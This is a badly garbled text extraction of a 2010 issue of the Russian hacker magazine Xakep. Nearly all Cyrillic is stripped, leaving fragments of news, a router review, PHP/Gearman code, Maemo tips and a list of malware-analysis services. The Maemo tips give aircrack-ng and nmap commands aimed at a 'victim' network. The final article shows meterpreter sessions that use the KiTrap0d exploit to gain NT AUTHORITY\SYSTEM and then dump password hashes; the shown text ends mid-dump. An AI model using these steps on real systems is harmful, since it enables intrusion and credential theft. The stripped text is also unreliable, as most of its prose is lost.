Вы находитесь на странице: 1из 148

.

54

x 03 () 2010

.
210
:

TDL3:

03 (134) 2010

USERLEVEL!
IE: 0-DAY

NT AUTHORITY \SYSTEM

WINDOWS

7
KDE

KDE 4

. 32

. 94

. 48

134

. 28



ASTERISK
. 119

INTRO

, . - IE
. , ,
(- ) Google. ,
.
, , ,
IE. -
IE. 144 .
!

nikitozz, . .
nikitoz@real.xakep.ru
z

Content
MegaNews
004

Ferrum
016


802.11n

PC_ZONE
020

, GOOGLE READER!

026

MAEMO 5 TIPS'N'TRICKS

028

032

USERLEVEL!

084

088

094

KDE

036

EASY-HACK

042

048

054

TDL3

058

GOV

060

VEH WINDOWS X64




Internet Explorer

064

068

SQL

072

X-TOOLS

2.

SQL

104

108

][-

110

074

079

][-
, BitTorrent

-
Windows
-

.NET
C++

SYN/ACK
114

119

126

132

IN DA FOCUS

,



Asterisk


Windows

134

7 KDE 4

098



NT AUTHORITY\SYSTEM Windows

Gujin,
netboot.me boot.kernel.org

PSYCHO:

138

FAQ UNITED

141

144

WWW2

FAQ
8.5
web-

028
094

072
048
/

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN\ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)

Dr. Klouniz
(alexander@real.xakep.ru)
>

(lyashchenko@gameland.ru)
> xakep.ru
(xa@real.xakep.ru)

/ART

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)

> Unix-
Ant
>

/PUBLISHING
>

119021, , . ,
. 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824


> GAMES & DIGITAL
(goryacheva@gameland.ru)
>






>

>
(strekneva@gameland.ru)
>

> -

>


(andrey@gameland.ru)
>


(devald@gameland.ru)
>


(kosheleva@gameland.ru )
>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24

>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

.
:

. ,

,
.
.


.
.

:
content@gameland.ru

.
, , 2009

MEGANEWS

MIFRILL MIFRILL@REAL.XAKEP.RU

MEGANEWS

,
SUN!

,
Oracle Sun Microsystems, .
, ,
, ,
. ,
Sun

Java, hardware-,
, ,
VirtualBox, Solaris , MySQL - .
, 9 , , ,
, ,
$7.4
! ,
Oracle ,
. .
Oracle


Kenai (www.kenai.com).
Sun 2008 ,
Java, , , . , ,
Java, Oracle,
. http://
sun.com , , ,
oracle.com.
Sun Microsystems,
IT.

004

LG
LG DVD- GH24 Super Multi.
24
,

Silent Play. Silent Play
,
.
GH24 2.400
, 32
;
, 30
.
, GH24
,
.
Jamless Play,


,
.


.
SecurDisc,

, LG iODD
,


-.
GH24 Super Multi
1100 .

WD
,
VelociRaptor Western
Digital. , , ; SATA
6 /, 10.000 /, 64 .
, 300 ;
, 600
. , HDD $300.

393 -
2009

BREIN.

X 03 /134/ 10

MEGANEWS
PC27

GOOGLE


90%
-
IPV4.

Google ,
, ,
, ,
. , ,
, , , IE6,
Google
(Yahoo, Symantec, Adobe ..). Google
(googleblog.blogspot.com) .

,
.
?
, , 4 , ,
Google.cn, , Baidu.com ? :) ,

.
, Microsoft
,

. ,
. Microsoft, ,
, ,
,
IE , , ,
, , .
IE . ,

Opera Software Mozilla. ,
Google

. , Opera ,
40% 4 .

QWERTY
Twitter
.
, , ,
Twitter,
370 ,

Twitter . blacklist naked,
stupid, twitter, secret, porsche,
ferrari russia.


123456 password
,
- -

. , gfhjkm (
) - .


,
. Twitter
, ,
malware-.


,
,
.

LENOVO
, - ? Lenovo IdeaPad U1 Hybrid,
- . ,
. - Qualcomm
Snapdragon, - 16 , 512 ,
11.6" (1366 768 ) .
- Intel Core 2 Duo U4100 1.3 , 4
DDR3 128 .
Skylight Linux, - Windows 7. Bluetooth,
3G WiFi ,
- 1.3 .
8 .
, $999.

006

X 03 /134/ 10

MEGANEWS
J3

PC27

, ;
13% ( AKAMAI).



aka Script, , carderplanet.
cc,

,
-
, .
Script

( -
),
,


.
,

: , ,

kraina.org.
ua,
.


,
,

.
, - , .

:
15.000 ,

, ,
.
kraina.org.ua
PR ,
400-500 ,
.

LINUX FOUNDATION, 5
LINUX- 80%.


Nexus One Google,
,
, , .
HTC,
T-Mobile G1 Nexus One . ,
: 3.7" (AMOLED, 480 x
800), , , ; Qualcomm Snapdragon
3G QSD8250 1 ; 512 , 512 ; SD 4 ( 32
); , 1400
. Android 2.1, GSM/
EDGE (850, 900, 1800, 1900 ), Wi-Fi (802.11b/g/n), Bluetooth
2.1 , 5 . ,
AGPS- .
Nexus One
$529.99. , ,
, , :).
, ?
Android, Cyanogen,
Nexus One
(http://forum.xda-developers.com/showthread.php?t=621441),
, .
(iptables,
USB, WLAN), SSH (
Dropbear) Nano, htop, powertop busybox.

008

2

PANDALABS.
X 03 /134/ 10

009

MEGANEWS


,
. , , Google,
Bing, Yahoo, MSN, . ,
, ,
, , ,
. , ,
,
, ,
. , 10-20 . .
- , , .
,
.

$1337 GOOGLE,

CHROME .

MYSQL!
Sun Oracle , , , MySQL.
, ,
, Sun 2008 ,
MySQL . - , 2009
Sun, , , 2009,
Sun Oracle. , Oracle
, MySQL, ,
. helpmysql.org, 30
. MySQL, .
, , ,
, , ,
. , MySQL
. . Oracle
Wall Street Journal,
SPAR Solaris , Sun, MySQL
.


- Microsoft
, ,
.
2007 , $240
. Facebook,

, , ,
. -
, ,
Facebook
2008. , ,

010


Facebook, Twitter (twitter.com/BillGates). ,
, Hello World.
380
. .
, 10 . ,
Microsoft
17 ?
X 03 /134/ 10

11

MEGANEWS



, , ,
, -, -,
SMS ,
,
. , ICQ . Piggy.zip H1N1
-,
.
\? : , ,
:), ? !. , . H1N1 , ,
ICQ , .
Piggy.exe, 1,95 ( !).
Delphi,
PEiD. , ,
,
.
OllyDbg 004A60AC. ,
:). , ,
5 (4 + -).
4-
,
. ,
. ,

. , : 000110001101010000110001
: 0001 1 0001 1 0101 0 0001 1 0001
4-
(0001b => 1, 0001b => 1, 0101b => 5), ,
(115d = 73h = s).
, . icq.com/people/__, HTTP- http://uasc.org.ua/Piggy.
php?=< > .
decoder.php , ,
, eLwaux (uasc.org.ua). , ,
. 2005
IM.Myspace04.AIM,
, (lol no its not its a virus,
). 2007 , .

aka segvec aka


soupnazi aka j4guar17,

, . , 2008 ,
19 ,
, .
,

15 25
,

. , ,

170 .

,
130 .
,

,
, LSD, ,
,


. ,
,
,

. ,
,

:).


22

. ,
Twitter IP-,
, . ,
, ,
. -
, , . , ,
, ,
, .

012

X 03 /134/ 10


ErgoMotion Smartfish
Technologies , . . .

, ,
,
. 7 ,
.
,
,
. USB.
, $150,
$50.

8199,5
INTEL CELERON 347 (3,06 ) TIN.


, , ,

,
.
Intel Netgear, CES 2010
Intel Wireless Display,
720p Wi-Fi. Intel WiDi ,
( Sony, Dell
Toshiba, Intel Core i3, i5
i7),
, .
,
802.11n,
,
. ,
HDCP (
), Full-HD,
,
,
WiDi.
.

AMAZON: 25 2009

.
X 03 /134/ 10

013
13

MEGANEWS

NETCRAFT , 1
2009 233.848.493 .

PS3

GeoHot,
jailbreak ,
Playstation 3,
.
PS3, , ,
.
, 3 , 2
11 ,
, . , PS3, , Xbox360,
,

. Xbox, PS3
Linux, ,
, ,
Linux . ?
,
/
ring0, .
Sony,
.
,
ROM Mark.


,
.

. ,
. ,

-,
PS2. PS3 Linux
.

, IPAD
,

Apple , iPad, , .
, Apple :
LED- 9.7" 1024 768 , , Multi-Touch; Apple A4
1 ; 16 64 -.

iPhone OS 3.2, , ,
iPhone iPod touch,
.
Apple, ,
WiFi Bluetooth,
3G-. iPad,
, 10
.
,
GPS, ,
,

.
- iBookstore,
. , iPad
: , , - ,
Skype ;
Flash, -,
, ; USB-;
, , , . () 242.8 189.7 13.4,
680 733 , .
iPad Wi-Fi
$500 $700, , iPad
Wi-Fi+3G $600 $800.

:
44-
.
014

X 03 /134/ 10

?
Google,
Microsoft , ,
,
.
Google Energy

, , ,
Google ,
.
, , , , ,

,

. , ,
,
Google ,
,
,
Google
.


MICROSOFT
, -,
Microsoft - ,
. Microsoft
,
Office 2003 2007,


. -
-? -
, ,
i4i.

Word, Microsoft
Word 2003
Custom XML, i4i .
2007 ,
Microsoft
$290 .,

Office, . Microsoft, , ,
,

Office
2010, .
Word 2007 Office 2007 Custom XML
.
X 03 /134/ 10

015

FERRUM

:

TRENDnet
TEW-652BRP

D-Link
DIR-85

NETGEAR
WNR-2000

D-Link
DIR-655

NETGEAR
WNR-3700

NETGEAR
WNR-3700

D-Link
DIR-655

ASUS
RT-N16

AMD Athlon
II X4 620

ASUS
RT-N16

802.11N

!,
WI-FI. ,
. ,
IEEE 802.11N, ( )
600 /!
2.4 5 . ,
. ,
.
:

.
1) ,
LAN, WAN. ,
( NAT). ( ),
. IP-.
2) PPTP- WAN-. , .
, ,
.
3) . ,
Wi-Fi. 1 6 ( ). Wi-Fi , . WPA2-PSK
AES.

016

ASUS RT-N16
D-LINK DIR-655
D-LINK DIR-855
NETGEAR WNR-2000
NETGEAR WNDR-3700
TRENDNET TEW-652BRP

PPTP, /C
Asus RT-N16

24.12
31.04
34.54
99.3

D-Link DIR-655

67.98

129.73
152.69

D-Link DIR-855

118.38
72.45

NETGEAR WNR-2000

78.8

TRENDnet TEW-652BRP
FDX

81.51
110.42

NETGEAR WNDR-3700
lanwan

113.2

161.68
176.02

51.72
50.34
55.01

wan-lan

D-LINK
PPTP-
X 03 /134/ 10

Link
-855

4700 .

ASUS
RT-N16

5200 .

: 1XWAN (RJ-45) 10/100/1000 /, 4XLAN (RJ-45)


10/100/1000 /
WI-FI: IEEE 802.11 B/G + IEEE
802.11N ( 300 /)
, : 2,4~2,5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP, AES)
: NAT/NAPT, DYNDNS, STATIC ROUTING, DHCP,
EZQOS
: SPI, PACKET FILTER, URL FILTER, MAC FILTER
: PPPOE, PPTP, L2TP,
IP-
: EZSETUP, WPS, - UPNP, WAN
BRIDGING, AIDISK, 2 USB 2.0

ASUS RT-N16 . ,
USB-
, .
(
HTTP, FTP BitTorrent) . Broadcom BCM4718,
533 , 128 DDR2.
, ; WPS ( ) EzQoS ( ).
WAN
IPTV CPU-. .

, NAT 145
/. PPTP .
X 03 /134/ 10

D-LINK
DIR-655
:

: 1XWAN (RJ-45) 10/100/1000 /, 4XLAN (RJ-45)


10/100/1000 /
WI-FI: IEEE 802.11 B/G + IEEE
802.11N ( 300 /)
, : 2.4~2.5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP/AES), WPS
: NAT/NAPT, DYNDNS, DHCP, STATIC ROUTING,
IGMP MULTICAST , QOS
: SPI, URL FILTER, MAC FILTER, IP FILTER,
ACCESS CONTROL
: PPPOE, PPTP, L2TP,
IP-
: WPS, USB-

,
3G,
. ,
, IGMP Multicast, QoS,
,

WPS. ,
,
.
PPTP, PPPoE L2TP. , , .

,
USB-,
.

017

FERRUM

WI-FI, 1 , /C
Asus RT-N16

40.89
50.26
32.76

D-Link DIR-655

59.64

72.33
68.32
91.37
100.8

D-Link DIR-855

85.92
46.18

NETGEAR WNR-2000

29.15

NETGEAR WNDR-3700
both

77.23

27.6

TRENDnet TEW-652BRP
Upstream

65.78

48.02

36.61

63.08
63.48

downstream

D-LINK DIR-855
, , 5

8200 .

D-LINK
DIR-855

NETGEAR
WNR-2000

2200 .

: 1XWAN (RJ-45) 10/100/1000 /, 4XLAN (RJ-45)


10/100/1000 /
WI-FI: IEEE 802.11 B/G + IEEE
802.11N ( 300 /)
, : 2,4~2,5, 5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP, AES)
: NAT, DYNDNS, STATIC ROUTING, DHCP, QOS
: SPI, URL FILTER, MAC FILTER, IP FILTER, DMZ
: PPPOE, PPTP, L2TP,
IP-
: WPS, USB-, -

: 1XWAN (RJ-45) 10/100 /, 4XLAN (RJ-45) 10/100


/
WI-FI: IEEE 802.11 B/G + IEEE
802.11N ( 300 /)
, : 2,4~2,5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP, AES)
: NAT, DYNDNS, STATIC ROUTING, DHCP, UPNP,
QOS
: SPI, URL FILTER, MAC FILTER, KEYWORD
BLOCKING
: PPPOE, PPTP, IP-, BIGPOND
: WPS,

-
,
. 5
, , ,
5 2.4 . . ,
LAN-WAN , , , Ethernet. USB,
, HDD , ,
D-Link DIR-655, .


WAN,
, . ,
.
, , ,
.
,
. ,
NETGEAR WNR-2000
.

,
, .


, -, ,
L2TP .

018

X 03 /134/ 10

WI-FI, 6 , /C
Asus RT-N16

23.72
32.76
31.53

D-Link DIR-655

33.84

65.26

43.9

D-Link DIR-855

72.19
38

NETGEAR WNR-2000

23.32
29.66

NETGEAR WNDR-3700

17.2

TRENDnet TEW-652BRP
Upstream

both

34.54

91.92
94.33

51.42
57.72
51.08
55.4

downstream

NETGEAR
WNR-3700

5200 .

TRENDNET
TEW-652BRP

: 1XWAN (RJ-45) 10/100/1000 /, 4XLAN (RJ-45)


10/100/1000 /
WI-FI: IEEE 802.11 B/G + IEEE
802.11N ( 300 /)
, : 2,4~2,5, 5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP, AES)
: NAT, DYNDNS, STATIC ROUTING, DHCP, UPNP, QOS
: SPI, URL FILTER, MAC FILTER, KEYWORD
BLOCKING
: PPPOE, PPTP, IP-, BIGPOND
: WPS,

NETGEAR WNR-2000 ( Wi-Fi),


. , USB
, DLNA, (2.4
5 ). ,
SMB, Wi-Fi,
,
. , , NAT
PPTP- !

NETGEAR : L2TP, web-.

,
, . -

X 03 /134/ 10

2000 .

: 1XWAN (RJ-45) 10/100 /, 4XLAN (RJ-45) 10/100


/
WI-FI: IEEE 802.11 B/G + IEEE
802.11N ( 300 /)
, : 2,4~2,5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP, AES)
: NAT, DYNDNS, STATIC ROUTING, DHCP
: SPI, URL FILTER, MAC FILTER, IP FILTER
: PPPOE, PPTP, L2TP,
IP-, BIGPOND
: WPS

,
, Russia PPTP Russia PPPoE. ,
. ,
. ,
, , .
:
VPN , IP-, IP, MAC
URL, Wi-Fi
Protected Setup.

, .
, .

, - ,
- ,
. ,
D-Link DIR-655,

,
.
TRENDnet TEW-652BRP,
.z

019

PC_ZONE
alex.raiden@gmail.com

,
GOOGLE READER!


, - .
, , ,
. . ,
!

Google Reader.
,
-
,
PHP MySQL.
RSS-

. ,
,
Key-Value-,

, ,
.
PHP!

,
.

RSS- , XML.
: RSS
(,

020

Mozilla Thunderbird), ,
- .
-,
, Google Reader.
:
, reader.
google.com .
, . , ,
.
(
, Google Reader ).
Twitter-, .
,
,
, . , ,
- ,
, , Google
,
, . ,
: -

, .

PHP-,
. ,
,
Amazon EC2 ?

. ,

, .

LAMP-,

Zend Framework jQuery, MySQL
.
Gearman. ,


:). .
X 03 /134/ 10

YOUR CLIENT APPLICATION CODE

GEARMAN
STACK

GEARMAN CLIENT API


(C, PHP, Perl, MySQL UDF, ...)

YOUR

GEARMAN JOB SERVER

PROVIDED

APPLICATION

gearmand

BY GEARMAN

GEARMAN WORKER API


(C, PHP, Perl, ...)
YOUR WORKER APPLICATION CODE

- GEARMAN


, .
, ,
, ,
URL , , , RSS ,
. URL
. !
?
,
.
, http:// ,
.
, ,
.
.
Zend Framework, , Zend_Uri, . ,
;
, - ?
, ,
( validURI.php),
, .
, X 03 /134/ 10

(,
),
Zend_Uri::factory .
- , .
: ,
http://
URL . ,
, ,
URL, , URL
.
,
. ,
-,
. ,
. Zend' Zend_Feed_Reader,
(
XSLT
CNBC).
,
RSS- , -

! Zend_Feed_Reader

, . ,
.
.
, ,

?
HTTP .
,
( HTTP-),
.
Zend
!
,

Zend_Feed_Reader:
$cache = Zend_
Cache::factory('Core', 'File',
array('lifetime' => 24 * 3600,
'automatic_serialization' => true,
'cache_id_prefix' => 'xakep_'
), array('read_control_type' =>
'adler32','cache_dir' => /tmp/
xakep/cache));

021

PC_ZONE



?
- PHP 5.2.11 , 5.3.1.
- -, Apache 2.2 Nginx.
- , MySQL , 5.1.
- Gearmand .
- Memcachedb, Gearmand
.
- Redis ,
Redis 1.2,
GitHub-.
- Zend Framework (
trunk- SVN-).
,
jQuery jQuery UI .
phpMyAdmin.

//
Zend_Feed_Reader::
setCache($cache);
// HTTP
Zend_Feed_Reader::useHttpCondition
alGet(true);


,
,

Memcached.
- .
MySql feeds user_
subscriptions .
?
;
, . feeds
, .
db.sql
.


, .
.
(, cron-) ,
, . ,
. -

022

, (
);

( ,

). : ,
?
.

.
MySQL
, , .
, , ,
, .
,

.
, SQL- - key/value (#128 z, PDF-
). ,
NoSQL- Redis.
,

, ,
.
Redis-
Rediska. , , Zend
Framework -,
, . :

$redis_conf =
Array( 'namespace'=>'xakep_',
'servers'=> array(array(
'host'=>'localhost',
'port' => 6379, 'weight'
=> 1)),
'keyDistributor' => 'crc32');));
try
{
$redis = new Rediska($redis_
conf);
}
catch (Rediska_Exception $e)
{
die("[ERROR] Error creating Redis
instance: " . $e->getMessage());
}

Redis- .
.
SET,
,
. ,
, ,
MD5 , .
,

.
!
processFeed (
processFeed.php) ,
, ,
. , ,
X 03 /134/ 10



GEARMAND

:
$_item['hash'] = md5($_
item['title'] . '|' . $_
item['link'] . '|' . $_
item['time']);

,
:
$_fhash = md5($feed_url); //

if ((!$redis->exists($_fhash))
|| (($redis->exists($_fhash)) &&
(!$redis->existsInSet($_fhash,
$_item['hash'])))
{
// , ! !
$redis->addToSet(md5($feed_url),
$_item['hash']);
}
else
continue;

,
, .

>getDateCreated()->getTimestamp();
$_item['link'] = $feed->getLink();

,
. ID , ,
,

md5-. , -

$feed = Zend_Feed_
Reader::import($feed_url);
if ($feed instanceOf
Zend_Feed_Reader_FeedAbstract)
{ /*
*/ }

, .
. ,
, ,
. , ,
,
, , , !
foreach
.

md5-
, . ,
Redis-. , ,
, .
.


,
, :
$_item['title'] =
htmlspecialchars($feed->getTitle(),
ENT_QUOTES);
$_item['time'] = $feedX 03 /134/ 10

023

PC_ZONE

, , , ,
, , . Zend :
$dbbeginTransaction() $dbcommit(). , , Rollback: $dbrollBack().
, (
), , ,
.
- ,
!

,
GEARMAN'

, ,
. ,
. , .
, -
, , .
.
, , Java,
Python. ,

.

, . ,
(, ),
,
. , ,
.
: Cron 5 ( , ) , , , Gearman'
. 10 , ,
, , . ,
,
.
, ,
, ,
, . , , .
,
,
. ,

,
,
JAVA,
PYTHON. ,
, .
, . , PHP! :)
Gearman. ,
, .
, , , ,
.
, ,
Gearman ,
. ! ,
Gearman , ,
, cron .
, API ,
MySQL UDF ( ).
C-,
,
PEAR- Net_Gearman, ,
. ,
, PECL.
apt-get install gearman-jobserver, gearmand d. 4730,
.
, ,
, . , . Gearman-, JSON-

024

, , ! ,
, , ,
, ,
. - , .

. , .
( feedWorker.php)
GearmanWorker, . (
) addServer(). , ,
,
addFunction. , , , Gearman
.
, ,
.
$worker = new GearmanWorker();
$worker->addServer();
$worker->addFunction("feedProcesor",
"myFeedProcessor");
function myFeedProcessor($job)
X 03 /134/ 10

GEARMAN
Gearman,
.
:
- (, job) ,
.
,
. , , ,
. , ,
. , JSON.
- ( ,
Job API), .
, , ,
-.
- (Task) , .
, ,
.
- ,
.
- , . ,

.
,
. ,
,
. ,
, Gearman MySQL
memcachedb ,
. , ,
.

$gmclient= new GearmanClient();


$gmclient->addServer();
$feed_links = $db->fetchAll('SELECT fid,
feed_url FROM feeds WHERE errors < 3');
foreach ($feed_links as $fl)
{
echo "Add to processing queue: " .
$fl['feed_url'] . "\n";
$gmclient>addTaskBackground('feedProcesor', Zend_
Json::encode(array($fl)));
}
$gmclient->runTasks();

, . , , Gearman API,

.
, 3- .
, , - ,
.
, JSON-. ,
,
runTasks().
. ,
.
, do(), ,
.
, ,
,
, .
Cron-,
, , . , ,
10 , .
: ,
, , .
,
, .
,
.

while ($worker->work());

, ?

{
$feeds =
Zend_Json::decode( $job-> workload() );

,
, .
JSON-,
Zend_Json, .

!
processFeed.php
processFeed()
$feeds.
Gearmand,
, $job>sendComplete('OK').
true: ,
. , , . :
X 03 /134/ 10

, ,
, , ,
,
.
, , Gearman.
,
. , Digg.com Yahoo!
Gearman.
Zend Framework , , RSS-
! , ,
, ,
,
. ,
, Google Reader,
. z

INFO

info
Gearman PHP
Extension:
pecl.php.net/package/
gearman.

Gearman:
pear.php.net/package/
Net_Gearman.
Python:
launchpad.net/
gearman-interface;
samuel.github.com/
python-gearman.
Java
:
launchpad.net/
gearman-java.
RSS (Really Simple
Syndication)


XML-


.
RSS,

, ,
Atom
RDF. Atom

http://tools.ietf.org/
html/rfc4287)
Google.

DVD
dvd

,


.

025

PC_ZONE
CODING
STEP

STEP@GLC.RU

ALEKSANDR-EHKKERT@RAMBLER.RU

MAEMO 5
TIPS'N'TRICKS

LINUX-, MAEMO
. ,
,
. , ,
,
.
1:

, N900, . ,

- , ,
.
,

.
,

AppWatch. Qt,

,
, ,
. ,


.deb- ( Bluetooth-,
).
. Nokia N900
,
,
deb- .documents
. ,
, :: dpkg
-i /home/user/MyDocs/.documents/
[ ].deb

026

MyMenu
Catorise,
, .

2:

,

X-Toolz. , nmap
aircrack
Maemo, Maemo5
.
, ,
!
Nmap N900

!
, Maemo GUI-,

: , nmap -v -O
PN 192.168.1.1. ,
Wi-Fi,
,

, ,
MAC-. ,
Wi-Fi WEP/WAP-,
aircrack'.
, WPA
/, -

,
.
,
WPA Handshake.

(
CUDA),
PS3
. ,
aircrack-ng
, , ,
ESSID
: aircrack-ng -c 11
-e victim -Z 4 -W 1 -F cap wlan0.
cap-,
. ,
, , N900
50 :).
extras-devel,
.

3:

,
N900 Quake 3, .
Maemo5

: Doom 2, Warcraft 2, Starcraft, Quake,
RedAlert, Duke Nukem 3D. , X 03 /134/ 10

BLUEMAEMO N900


Linux': , Quake 3 OpenArena, Warcraft 2 WarGus,
Doom PrBoom ..
Simple DirectMedia Layer (SDL),
,
Maemo,
. , SDL
,
,
.
,
, , Linux', ,
SDL.
,
.
.

DOSBox,
N900.
DOS,
, MS-DOS.
,
Fallout ( DOSBox'
: migenonline.com/
N900/dosbox-0.73-Fallout1.conf.txt), ,

.

4:


N900 , AJAX, Gmail.
,
MicroB Mozilla Gecko,
Firefox
. Fennec, 6-
-, - :
. ,
X 03 /134/ 10

NMAP N900

, , ,
. Fennec
2,
. . ,
,
about:config, browser.cache.disk.
enable .

, .
,
, ,
Ctrl-Shift+O,
. N900

,
.

5:

, ,
. ,
N900
BlueMaemo.
? Maemo
, Blueooth.
, Bluetooth
HID Bluetooth,
.
BlueMaemo Wait
a connection ( ).
, , Bluetooth-,


.
Bluetooth- : .

-

. :
N900
, . ,
,
( ),
-.
,
BlueMaemo PlayStation 3,

Bluetooth-. Linux-, HID-
hcitool
scan, ,
hidd connect _bt___
hid, .

6: N900

N900, ,
,
. ,
Linux',
,
,
, ,
. ,

, RDA (Remote
Device Access) apu.
ndhub.net.
/,
www.forum.nokia.com.

( Firefox, IE, Opera Safari
Google Chrome ),
JRE. ,
( , Nokia X6)
.jnlp-, Java.
, !

Maemo (www.xakep.ru/N900). z

027

PC_ZONE
Step twitter.com/stepah

! ,
, ,
, . ,
,

?
? ,
,
? :).


.


-

, . ,
- ,
.

.

VIRUSTOTAL
WWW.VIRUSTOTAL.COM


- ,
VirusTotal. :

40 ,

028

.
,
,
,
:).
, - VirusTotal
Uploader.
,
. ,

, .
,
, ,
,
. ,

SANDBOXIE
WWW.SANDBOXIE.COM

, : , ,
, ,
. ,
,
. , , ,
,
(sandbox).
, ,
,
,

X 03 /134/ 10

CWSANDBOX'


,
. Vista
: sandbox
,
UAC.
, ,

, Sandboxie.

,
, sandbox'.
, ,
sandbox, - ? .
,
.
Sysinternals (technet.microsoft.
com/ru-ru/sysinternals) , ,
Process Monitor,
,
, , DLL.
Autoruns
,
- .
API, .
API Monitor
(www.apimonitor.com)
SysAnalyzer (labs.idefense.com). , ,
,
.
, , , :
X 03 /134/ 10

,
,
.

,
. ,

, , ,
host ,

, Threat Expert
. ,

,

. ,
: GUI-,
. ?
,
.
:
CWSAndbox , , VirusTotal
(,
). -
,

.

ANUBIS
ANUBIS.ISECLAB.ORG

,
CWSAndbox.
,
,
. ,
,
,
!


CWSAndbox
, . ,
CWSAndbox :
- , , . . , ,
, ,

.
...

, , , Threat Expert ,
,
. , , ,
, ?
-
.
,
, Anubis.
pcap-
,

Wireshark',
,
Network Miner (networkminer.sourceforge.net),
.
, Anubis
.
HTTP, .
,
:
,
.

.

THREAT EXPERT
WWW.THREATEXPERT.COM

COMODO INSTANT MALWARE ANALYSIS


CAMAS.COMODO.COM

CWSANDBOX
WWW.CWSANDBOX.ORG

Threat Expert,

- Comodo : -

029

PC_ZONE

PDFID
BLOG.DIDIERSTEVENS.COM/
PROGRAMS/PDF-TOOLS

ANUBIS PCAP-

, . ,
CWSandbox Threat Expert
.
, ,
,
, -
.
Comodo ,

. ,
:
,
DNS/
HTTP-, API-, DLL- ..
,
, , .

MANDIANT RED CURTAIN


WWW.MANDIANT.COM

Mandiant
Red Curtain, . PE-
:
, ,
.
, ,
, ,
.
,
,
.. ( -).
, Mandiant Red Curtain, ,
,
.

PEID
PEID.HAS.IT

,
,
/.
, -,
, , -, -

030


. , , PEiD.

600 PE-,
/,
.
, Python nPEid
(http://www.malforge.com/npeid/npeid.
zip). pcap-
PE-,
. , PEiD
:
.

OSAM
WWW.ONLINE-SOLUTIONS.RU/
PRODUCTS/OSAM-AUTORUNMANAGER.HTML

,
- ,

. Online Solutions Autorun Manager,
.


. OSAM . ,
,
.
API (RegQueryValue, RegOpenKey ..),
.
, OSAM

. ,
Online :
, ,
,
.
.

,

.
,

. PDF-
, Adobe Reader.
Internet Explorer , Adobe Reader
,
.
, ,
JavaScript,
PDF-
. ,
PDF JavaScript, ,
, ,
?
PDF-
, ,
. PDF
,
JavaScript'. ,
/JS /JavaScript ,
JS-. /AA /OpenAction
, ,
.
PDF
JS-

PDF-
JS

X 03 /134/ 10

HTTP://WWW
links
:
tinyurl.com/reversemalware-sheet.

INFO

info


,
Returnil
Virtual System (www.
returnilvirtualsystem.
com).

,
.
PDFiD,
PDF Tools Python'. ,
JS,
pdf-parser.
JS-
.

Malware URL.


(VirusTotal, Wepawet, Anubis, Threat
Expert), .
: ,
.
,
RSS. , ,
:).

WEPAWET
WEPAWET.ISECLAB.ORG

- PE-. Wepawet
PDF, HTML Flash
.
Wepawet ,
,
.
, Wepawet
,
,
. Wepawet
JS-,
HTML,
. SWF ,
-!

MALWARE URL
WWW.MALWAREURL.COM

, , Wepawet X 03 /134/ 10

, !

, .
, .

,
.
- . z


Windows


,
: Program
Files, Windows, Users\
%AllUsersProfile%\
ProgramData, Documents and Settings
HKLM\
Software.

,
.
Norman Sandbox
(www.norman.com/
security_center/
security_tools/submit_
file/en)

DVD
dvd

,
,
DVD.

031

PC_ZONE

NT AUTHORITY\SYSTEM

Step twitter.com/stepah

NT AUTHORITY\SYSTEM
GETSYSTEM

GETSYSTEM

USERLEVEL!

NT AUTHORITY\SYSTEM
WINDOWS

METASPLOIT
,
. GETSYSTEM, USER LEVEL RING0,
NT AUTHORITY\SYSTEM! .

19
0-day ,
Windows,
NT 3.1,
1993 , . exploit-db.com Tavis Ormandy

KiTrap0d, ,
. .
vdmexploit.dll
vdmallowed.exe, -
-, exe-.
, , ,

, NT AUTHORITY\SYSTEM.
,
.
cmd.exe
. ?
,

.
Internet Explorer
, -

032

. ,
( ), ? -
KiTrap0d,
NT AUTHORITY\SYSTEM!
, ,
,
, ,
(
). NT !
,
Microsoft, , .


, 25
Metasploit , KiTrap0d
.

, , .
,
Metasploit
update. ,
, run kitrap0d
.

, -
, Metasploit.

,
meterpreter, :).
,
( )
. ,
:
meterpreter > getuid
Server username: WINXPSP3\user

, . ,
,
. ,
getsystem, , ,
:
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege
to that of local system.
OPTIONS:
X 03 /134/ 10

KITRAP0D

, MICROSOFT

FIXIT!


-h Help Banner.
-t The technique to use. (Default
to '0').
0 : All techniques available
1 : Service Named Pipe
Impersonation (In Memory/Admin)
2 : Service Named Pipe
Impersonation (Dropper/Admin)
3 : Service Token Duplication
(In Memory/Admin)
4 : Exploit KiTrap0D (In Memory/
User)

, KiTrap0D
. ,
,
NT AUTHORITY\SYSTEM (
-t). ,
, ,
. KiTrap0D,
,
.
meterpreter > getsystem
...got system (via technique 4).

, , KiTrap0D ,
.
? UID ( ):
X 03 /134/ 10

meterpreter > getuid


Server username: NT AUTHORITY\
SYSTEM

! NT AUTHORITY\SYSTEM
. , ,
. ,
Microsoft
.


, . Metasploit
hashdump

pwdump. ,
, LANMAN/
NTLM
. . ,
hashdump
NT AUTHORITY\SYSTEM.

[-] priv_passwd_get_sam_hashes:
Operation failed: 87. ,
LANMAN/NTLM- HKEY_LOCAL_MACHINE\SAM HKEY_
LOCAL_MACHINE\SECURITY, .
. ,


hashdump ,
,
. , ?
meterpreter > getuid
Server username: NT AUTHORITY\
SYSTEM
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key
using SYSKEY 3ed7[...]
[*] Obtaining the user list and
